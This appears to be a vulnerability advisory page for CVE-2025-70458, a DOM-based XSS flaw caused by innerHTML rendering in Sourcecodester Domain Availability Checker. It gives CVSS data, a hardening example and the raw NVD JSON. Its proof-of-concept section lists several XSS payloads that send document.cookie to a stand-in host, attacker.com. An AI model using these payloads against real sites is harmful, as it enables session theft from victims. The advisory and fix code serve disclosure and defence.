Security Vulnerability Report
CVE-2025-70458 CVSS 5.4 MEDIUM

CVE-2025-70458

Published: 2026-01-23 22:16:15
Last Modified: 2026-01-30 17:59:10

Description

A DOM-based Cross-Site Scripting (XSS) vulnerability exists in the DomainCheckerApp class within domain/script.js of Sourcecodester Domain Availability Checker v1.0. The vulnerability occurs because the application improperly handles user-supplied data in the createResultElement method by using the unsafe innerHTML property to render domain search results.
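The description above names the root cause: the user-supplied domain string is rendered through innerHTML inside createResultElement. The block below is an added example, not code from the Domain Availability Checker project, showing the vulnerable shape beside its hardened forms: HTML escaping where a string template is still used, building the result node with createElement/textContent so the browser never parses the input as markup, and an allow-list check for syntactically valid hostnames, which a domain checker has a natural reason to enforce. The function names, the result-element layout, the doc parameter and the probe string are assumptions.

```javascript
// Added example (not the project's code): hardened versions of the result
// renderer described in the advisory. The vulnerable pattern is an innerHTML
// assignment that interpolates the user-supplied domain string verbatim.
// Function names and element layout are assumptions.

// Hostname allow-list: labels of 1-63 alphanumerics/hyphens, no leading or
// trailing hyphen, at least one dot, alphabetic TLD, total length <= 253.
const DOMAIN_RE = /^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$/i;

function isValidDomain(input) {
  return typeof input === 'string' && DOMAIN_RE.test(input.trim());
}

// Minimal HTML escaping for the cases where markup is still built as a string.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(str) {
  return String(str).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// Vulnerable shape (for contrast only): the domain is concatenated verbatim;
// once the caller assigns this to innerHTML, attacker markup is parsed.
function renderResultHtmlUnsafe(domain, available) {
  return `<div class="result"><span class="domain">${domain}</span>` +
         `<span class="status">${available ? 'Available' : 'Taken'}</span></div>`;
}

// Hardened string version: every interpolated value is escaped first.
function renderResultHtml(domain, available) {
  return `<div class="result"><span class="domain">${escapeHtml(domain)}</span>` +
         `<span class="status">${available ? 'Available' : 'Taken'}</span></div>`;
}

// Preferred fix: build nodes with the DOM API and set text via textContent.
// `doc` is passed in (use `document` in the browser) so the function can be
// exercised outside a browser; invalid input is rejected before rendering.
function createResultElement(doc, domain, available) {
  if (!isValidDomain(domain)) {
    throw new RangeError('rejected: not a syntactically valid domain name');
  }
  const wrapper = doc.createElement('div');
  wrapper.className = 'result';
  const name = doc.createElement('span');
  name.className = 'domain';
  name.textContent = domain;           // becomes a text node, never parsed as HTML
  const status = doc.createElement('span');
  status.className = 'status';
  status.textContent = available ? 'Available' : 'Taken';
  wrapper.appendChild(name);
  wrapper.appendChild(status);
  return wrapper;
}

// Constructed probe string used to check the renderers (a harmless marker,
// not one of the advisory's payloads).
const PROBE = '<img src=x onerror="alert(1)">';
```

In the browser, call createResultElement(document, domain, available) and append the returned node where the old innerHTML assignment was. The allow-list is defence in depth, not a substitute for output encoding: the textContent form stays safe even for inputs the validator accepts, and escapeHtml covers any remaining place where HTML is still assembled as a string.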

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:remyandrade:domain_availability_checker:1.0:*:*:*:*:*:*:* - VULNERABLE
Sourcecodester Domain Availability Checker v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-70458 DOM-based XSS PoC
// Target: Sourcecodester Domain Availability Checker v1.0
// Attack Vector: Inject malicious JavaScript via domain search input

// Malicious domain input that triggers XSS:
const maliciousInput = '<img src=x onerror="fetch(\"https://attacker.com/steal?cookie=\"+document.cookie)\">"';

// Alternative payloads:
const payloads = [
  '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>',
  '<svg onload="fetch(\"https://attacker.com/steal?c=\"+btoa(document.cookie))\">',
  '<iframe src="javascript:fetch(\'https://attacker.com/xss?c=\'+document.cookie)">',
  'javascript:fetch("https://attacker.com/steal?c="+document.cookie)',
  '<body onload="fetch(\"https://attacker.com/steal?c=\"+document.cookie)\">'
];

// Attack scenario:
// 1. Attacker crafts a URL with the malicious domain parameter
// 2. Victim visits the page with the malicious parameter
// 3. createResultElement() renders the input using innerHTML
// 4. Malicious JavaScript executes in victim's browser context

References

https://github.com/ismaildawoodjee/vulnerability-research/security/advisories/GHSA-chm7-vgf7-6f9p (Exploit, Third Party Advisory)
https://www.sourcecodester.com/php/18500/domain-availability-checker-using-php-and-javascript-source-code.html (Product)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-70458",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-23T22:16:15.360",
    "lastModified": "2026-01-30T17:59:09.610",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "A DOM-based Cross-Site Scripting (XSS) vulnerability exists in the DomainCheckerApp class within domain/script.js of Sourcecodester Domain Availability Checker v1.0. The vulnerability occurs because the application improperly handles user-supplied data in the createResultElement method by using the unsafe innerHTML property to render domain search results."},
      {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) basada en DOM existe en la clase DomainCheckerApp dentro de domain/script.js de Sourcecodester Domain Availability Checker v1.0. La vulnerabilidad ocurre porque la aplicación maneja incorrectamente los datos proporcionados por el usuario en el método createResultElement al usar la propiedad insegura innerHTML para renderizar los resultados de búsqueda de dominio."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:remyandrade:domain_availability_checker:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "74B1DD83-26CA-4E69-A7E1-06F013582A56"}]}]}
    ],
    "references": [
      {"url": "https://github.com/ismaildawoodjee/vulnerability-research/security/advisories/GHSA-chm7-vgf7-6f9p", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]},
      {"url": "https://www.sourcecodester.com/php/18500/domain-availability-checker-using-php-and-javascript-source-code.html", "source": "[email protected]", "tags": ["Product"]}
    ]
  }
}